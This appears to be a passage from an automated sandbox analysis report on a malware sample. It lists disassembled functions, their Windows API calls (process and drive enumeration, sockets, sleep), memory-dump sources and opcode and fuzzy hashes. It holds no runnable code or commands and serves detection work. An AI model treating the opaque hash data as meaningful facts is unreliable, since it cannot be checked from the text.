                                                                • Process32FirstW.KERNEL32(47CF7FBB,?,?,?), ref: 07000362
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635445326.0000000007000000.00000040.00001000.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7000000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: FirstProcess32
                                                                • String ID:
                                                                • API String ID: 2623510744-0
                                                                • Opcode ID: d237fffa16db071e318beb57bb455496a6ce0a558a1482da107d1a92e7b3a25c
                                                                • Instruction ID: 2febd6c2bec85747e30990148a2c99349fe94c132403ca864942b533b93dbcb1
                                                                • Opcode Fuzzy Hash: d237fffa16db071e318beb57bb455496a6ce0a558a1482da107d1a92e7b3a25c
                                                                • Instruction Fuzzy Hash: FDE0D8FB7091147FA21396811BD55FE7B2CDEC72B1B318479E00495015DEE00D4E93B1
                                                                Function 06FB0CD2 Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetLogicalDrives.KERNELBASE ref: 06FB0CDA
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635326293.0000000006FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6fb0000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: DrivesLogical
                                                                • String ID:
                                                                • API String ID: 999431828-0
                                                                • Opcode ID: c5b4a97b93232ee9a3c1654e88be541b49dde5b613749d7f8f06796572eb5c17
                                                                • Instruction ID: 1e5445092c363bf7142f5a8d0c465822b1bec040dff13ecc045cc2e569bdf396
                                                                • Opcode Fuzzy Hash: c5b4a97b93232ee9a3c1654e88be541b49dde5b613749d7f8f06796572eb5c17
                                                                • Instruction Fuzzy Hash: E4E017E725C0117D76C2D1963BB16F76B9FE4CB6303309817F80AC8986DE891A4A1173
                                                                Function 0094AF30 Relevance: 1.5, APIs: 1, Instructions: 29networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • socket.WS2_32(?,0094B280,00000000,-00000001,00000000,0094B280,?,?,00000002,00000011,?,?,00000000,0000000B,?,?), ref: 0094AF67
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2623343167.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                                • Associated: 00000000.00000002.2622956049.0000000000880000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2623343167.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2623343167.0000000000E93000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2623343167.0000000000E95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632240047.0000000000E98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000001132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.000000000121C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632903275.000000000121D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2633050684.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2633078938.00000000013D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_880000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: socket
                                                                • String ID:
                                                                • API String ID: 98920635-0
                                                                • Opcode ID: 13a234d225264f176428c79716ed8276dc0b6011879153129ffd569ac02cec9d
                                                                • Instruction ID: f31e9c4a71810d02f43b08702e05039e597d4fdbae0ff5f3ec13285fa89486f1
                                                                • Opcode Fuzzy Hash: 13a234d225264f176428c79716ed8276dc0b6011879153129ffd569ac02cec9d
                                                                • Instruction Fuzzy Hash: 1DE0EDB6A093216FD654DB18F844DABF36DEFC4B20F055A89B85467204C330AC558BE2
                                                                Function 0094B020 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • closesocket.WS2_32(?,00949422,?,?,?,?,?,?,?,?,?,?,?,00933377,00CC7680,00000000), ref: 0094B04D
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2623343167.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                                • Associated: 00000000.00000002.2622956049.0000000000880000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2623343167.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2623343167.0000000000E93000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2623343167.0000000000E95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632240047.0000000000E98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000001132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.000000000121C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632903275.000000000121D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2633050684.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2633078938.00000000013D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_880000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: closesocket
                                                                • String ID:
                                                                • API String ID: 2781271927-0
                                                                • Opcode ID: 808e21bd5e4cd241bc055dda431bd06b07646c775277c96fe955f53abee9f266
                                                                • Instruction ID: 80bc8b3373954415339e67fd6e54ac61194b8a80750a1e45f4cecf3b81acac39
                                                                • Opcode Fuzzy Hash: 808e21bd5e4cd241bc055dda431bd06b07646c775277c96fe955f53abee9f266
                                                                • Instruction Fuzzy Hash: E3D0EC3460020157CA249A148984A67776B7FD1711FA9CA68A42C4A569D73ADC468641
                                                                Function 0700034E Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • Process32FirstW.KERNEL32(47CF7FBB,?,?,?), ref: 07000362
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635445326.0000000007000000.00000040.00001000.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7000000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: FirstProcess32
                                                                • String ID:
                                                                • API String ID: 2623510744-0
                                                                • Opcode ID: 0fd51c1e2972fd80b1d7c73fe84255666e48674007a1835a1cf5e21e7994a852
                                                                • Instruction ID: 724bf1588d894d6850cd4c92820dc1059a649e5616b80232383762c4a6b08594
                                                                • Opcode Fuzzy Hash: 0fd51c1e2972fd80b1d7c73fe84255666e48674007a1835a1cf5e21e7994a852
                                                                • Instruction Fuzzy Hash: 93D0A7A5B0620C7F9301A6525AE06EF362CDE967F0B35C468A01499124DFA05C45A3E0
                                                                Function 008E67E0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • ioctlsocket.WS2_32(?,8004667E,?,?,008BAF56,?,00000001), ref: 008E67FC
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2623343167.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                                • Associated: 00000000.00000002.2622956049.0000000000880000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2623343167.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2623343167.0000000000E93000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2623343167.0000000000E95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632240047.0000000000E98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000001132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.000000000121C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632903275.000000000121D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2633050684.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2633078938.00000000013D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_880000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: ioctlsocket
                                                                • String ID:
                                                                • API String ID: 3577187118-0
                                                                • Opcode ID: aa6ed6e3fefe81b0d2eb5d89cf4e6d3dff1a5c7e15842f73a6b1375bf3cdc5e7
                                                                • Instruction ID: 83e04ead97ecfab842b32efa3409d0dda0cbd0588d593ef691927f796129b38d
                                                                • Opcode Fuzzy Hash: aa6ed6e3fefe81b0d2eb5d89cf4e6d3dff1a5c7e15842f73a6b1375bf3cdc5e7
                                                                • Instruction Fuzzy Hash: E9C080F111D201BFC70C8714D855B2F77D8DB44355F13581CB046C1190EA345990CF1B
                                                                Function 008831D7 Relevance: 1.3, APIs: 1, Instructions: 73COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2623343167.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                                • Associated: 00000000.00000002.2622956049.0000000000880000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2623343167.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2623343167.0000000000E93000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2623343167.0000000000E95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632240047.0000000000E98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000001132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.000000000121C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632903275.000000000121D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2633050684.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2633078938.00000000013D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_880000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: CloseHandle
                                                                • String ID:
                                                                • API String ID: 2962429428-0
                                                                • Opcode ID: 0469524f39816575881b5fd1c13a55a4e85faa77bf4bfa221f5e2583f18a9c15
                                                                • Instruction ID: 5f3c00b6f7ee40ee1909fee21fa57215cd367bb7f649ca90bebf9ac8593e3330
                                                                • Opcode Fuzzy Hash: 0469524f39816575881b5fd1c13a55a4e85faa77bf4bfa221f5e2583f18a9c15
                                                                • Instruction Fuzzy Hash: 4F3181B49097099BCB00EFB8C98569EBBF4FF44744F00886EE898A7351E7749A44DF52
                                                                Function 00C0B160 Relevance: 1.3, APIs: 1, Instructions: 9sleepCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2623343167.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                                • Associated: 00000000.00000002.2622956049.0000000000880000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2623343167.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2623343167.0000000000E93000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2623343167.0000000000E95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632240047.0000000000E98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000001132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632368315.000000000121C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2632903275.000000000121D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2633050684.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2633078938.00000000013D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_880000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: Sleep
                                                                • String ID:
                                                                • API String ID: 3472027048-0
                                                                • Opcode ID: d67f5ba562bf8adc7c04a6883a17ce67d4bf511e8dc4890cb7991c4f7d17ede7
                                                                • Instruction ID: 39d1de8ddd0b1d5fc5ec538b0c2750156445db682d0703787bad4f1dc57934e4
                                                                • Opcode Fuzzy Hash: d67f5ba562bf8adc7c04a6883a17ce67d4bf511e8dc4890cb7991c4f7d17ede7
                                                                • Instruction Fuzzy Hash: B6C04CE1C1474446D700BB38C58611D79E47745108FD11B68998496195F62893198657
                                                                Function 06FA04BB Relevance: .4, Instructions: 420COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635283279.0000000006FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6fa0000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 56c359b883a2b45c88bcfda2ba9ef0b64bf96002ef6372b40897b88c4535a6da
                                                                • Instruction ID: c1424644d77739ff5e5642715d4392fa90b9793244b279f63e5b5186aa83085f
                                                                • Opcode Fuzzy Hash: 56c359b883a2b45c88bcfda2ba9ef0b64bf96002ef6372b40897b88c4535a6da
                                                                • Instruction Fuzzy Hash: 6491BBFB40C315BEF3818585BB54BFA676EE7DA338F308426F407D1602EBA80A4955B5
                                                                Function 06FA04A4 Relevance: .4, Instructions: 418COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635283279.0000000006FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6fa0000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: eaf105c46d9072c4d140e678bf21bd4dec52fb084b50290f74f758c6dc3dbd72
                                                                • Instruction ID: e7db5e64754541bfe858c6da36167640bbfbede465320755e9a9c7d49809de26
                                                                • Opcode Fuzzy Hash: eaf105c46d9072c4d140e678bf21bd4dec52fb084b50290f74f758c6dc3dbd72
                                                                • Instruction Fuzzy Hash: 4491A9FB40C315BEF3818585BB54BFA676EE7DA338F308426F407D1602EBA80A4945B5
                                                                Function 06FA0586 Relevance: .4, Instructions: 395COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635283279.0000000006FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6fa0000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 65012b55868cf1cd3055c77673169bd333b7cc360bafc195297db006b1cd0602
                                                                • Instruction ID: 2d46ea062ed0e02911e8949798e70328f464bf479ff293e5532e296feff2b1a7
                                                                • Opcode Fuzzy Hash: 65012b55868cf1cd3055c77673169bd333b7cc360bafc195297db006b1cd0602
                                                                • Instruction Fuzzy Hash: A1919BFB44C315AEF3818585BB54BFA676EE7D633CF308426F407D1602EBA80A4945B5
                                                                Function 06FA0501 Relevance: .4, Instructions: 395COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635283279.0000000006FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6fa0000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: af3cafb0f7ba9d86a2a81ce2ff0b04cef78dfd2cae6af92c2b121888e6647c8f
                                                                • Instruction ID: 709da454c07e293a101a6132b7f78c65a589aca78e48851c385a6aa159ac20a3
                                                                • Opcode Fuzzy Hash: af3cafb0f7ba9d86a2a81ce2ff0b04cef78dfd2cae6af92c2b121888e6647c8f
                                                                • Instruction Fuzzy Hash: 86916AFB44C315BEF3818585BB54BFA676EE7DA338F308426F407D1602EBA80A4945B5
                                                                Function 06FA0515 Relevance: .4, Instructions: 386COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635283279.0000000006FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6fa0000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 42fe5e6b74f0dd17d0c97c3d157c4c4e6bc2b32366b2082adc2496edc3d1a827
                                                                • Instruction ID: dd89ca7226fd8e10f99a12f325716eb941e3091bd544d1ac7066d32f7843dded
                                                                • Opcode Fuzzy Hash: 42fe5e6b74f0dd17d0c97c3d157c4c4e6bc2b32366b2082adc2496edc3d1a827
                                                                • Instruction Fuzzy Hash: D6818BFB44C315AEF3818585BB54BFA676EE7DA33CF308426F407D1602EBA80A4945B5
                                                                Function 06FA052C Relevance: .4, Instructions: 385COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635283279.0000000006FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6fa0000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a5c9b72550efd075ccb24fb642f45e9f749da5b7ca96884cf886db894066bb67
                                                                • Instruction ID: 923d1af214a5ba7584b9ed182b9d945b795f116620bfbecb76df8964ce25abba
                                                                • Opcode Fuzzy Hash: a5c9b72550efd075ccb24fb642f45e9f749da5b7ca96884cf886db894066bb67
                                                                • Instruction Fuzzy Hash: C0818BFB44C315AEF3818585BB54BFA676EE7D633CF308426F407D1602EBA80A4945B5
                                                                Function 06FA05C6 Relevance: .4, Instructions: 368COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635283279.0000000006FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6fa0000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6a6c12590e46b58d36fe42510bdfab752dd28d28593adf66a2a0af7463aee84e
                                                                • Instruction ID: df0d88c438c4c99e2d1456b5c5d0988ad971faa1a3c874518438f7074f8f4c8d
                                                                • Opcode Fuzzy Hash: 6a6c12590e46b58d36fe42510bdfab752dd28d28593adf66a2a0af7463aee84e
                                                                • Instruction Fuzzy Hash: 71817CFB44C315BEF3818585BB54BFA676EA7D633CF308426F407D1602EBA80A8945B5
                                                                Function 06FA0563 Relevance: .4, Instructions: 355COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635283279.0000000006FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6fa0000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: cade172d505f859c7eee10ed28b475692c2625510dd6898a017c1347abfa90bc
                                                                • Instruction ID: d3cef347b142274647d9352c30c71f3b142b09b13d295d9f2abf4f44c5ff5015
                                                                • Opcode Fuzzy Hash: cade172d505f859c7eee10ed28b475692c2625510dd6898a017c1347abfa90bc
                                                                • Instruction Fuzzy Hash: C871BFFB40C315FEF3828585BB54AFA676EE7DA33CB308426F407D5602EBA40A4945B5
                                                                Function 06FA05AC Relevance: .4, Instructions: 350COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635283279.0000000006FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6fa0000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 42ba57c704a8ff69247ff25089f2292a796290f526967b93fd63bd3f078b541d
                                                                • Instruction ID: 0e758eedc1ccff24b1e6facb0c542202f2ec39bd07b0c89f99199cc16a6b3761
                                                                • Opcode Fuzzy Hash: 42ba57c704a8ff69247ff25089f2292a796290f526967b93fd63bd3f078b541d
                                                                • Instruction Fuzzy Hash: 54716CFB44C315BEF3818585BB54BFA676EA7DA33CF308426F407D1601EBA80A8945B5
                                                                Function 06FA05DA Relevance: .3, Instructions: 341COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635283279.0000000006FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6fa0000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4a3b41367d40d4410c85ac84d53cc78e3b213184835b0c3f909ac88a97bfd3e3
                                                                • Instruction ID: ad0a2fa53822e5e6e7cd8350ed38ad4e2a848d9971dd3ab1b820478e452f3a63
                                                                • Opcode Fuzzy Hash: 4a3b41367d40d4410c85ac84d53cc78e3b213184835b0c3f909ac88a97bfd3e3
                                                                • Instruction Fuzzy Hash: 13716CFB44C315BEF3818581BB54BFA676EA7DA33CF308426F407D5602EBA80A4945B5
                                                                Function 06FA05EE Relevance: .3, Instructions: 338COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635283279.0000000006FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6fa0000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 10ea050557df004eba8eb39251f61666e29e75ee80a429e42b2e88b80ddd6c4e
                                                                • Instruction ID: c20cdfe9ba1f55a3c5298b413f8c64d8cd7d040856f96dc3b82bb52218a4a854
                                                                • Opcode Fuzzy Hash: 10ea050557df004eba8eb39251f61666e29e75ee80a429e42b2e88b80ddd6c4e
                                                                • Instruction Fuzzy Hash: E1719EFB44D315FDB3818581BB54AFA676EE7DA33CB308426F407D1602EBA40A8945F5
                                                                Function 06FA0605 Relevance: .3, Instructions: 338COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635283279.0000000006FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6fa0000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a7e8a262bb2aa9e5715bdfb243d999854399d46fb82e282f73a6405587ca71be
                                                                • Instruction ID: 4d8fce9fc2ca71e8eb521852492b983190c32de9429e34f80cca4376b0e3d60f
                                                                • Opcode Fuzzy Hash: a7e8a262bb2aa9e5715bdfb243d999854399d46fb82e282f73a6405587ca71be
                                                                • Instruction Fuzzy Hash: F571AEFB44C315FEB3818581BB54AFA676EE7DA33CB308426F407D1602EBA40A8945F5
                                                                Function 06FA062C Relevance: .3, Instructions: 327COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635283279.0000000006FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6fa0000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ef03010706e407589a94fa4278d65e8bd4bd24c04986dd311d11eeec0a6000d7
                                                                • Instruction ID: 7c055a097eae66e7969c9bf9f7551a332e038000490d0593de91b7b27a1855be
                                                                • Opcode Fuzzy Hash: ef03010706e407589a94fa4278d65e8bd4bd24c04986dd311d11eeec0a6000d7
                                                                • Instruction Fuzzy Hash: FB619DFB44C315FEB3818581BB54AFA676EE7DA33CB308426F407D1602EBA80A4945F5
                                                                Function 06FA06B9 Relevance: .3, Instructions: 324COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635283279.0000000006FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6fa0000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 99742d5713e133a20b56fe90da13888d9ebf3e2b9eea7ae5d7afc833c1787e58
                                                                • Instruction ID: 24fb9a101dfa4f4c39ef92b54f112845d2ea771d4699e8db6c0801d29f430489
                                                                • Opcode Fuzzy Hash: 99742d5713e133a20b56fe90da13888d9ebf3e2b9eea7ae5d7afc833c1787e58
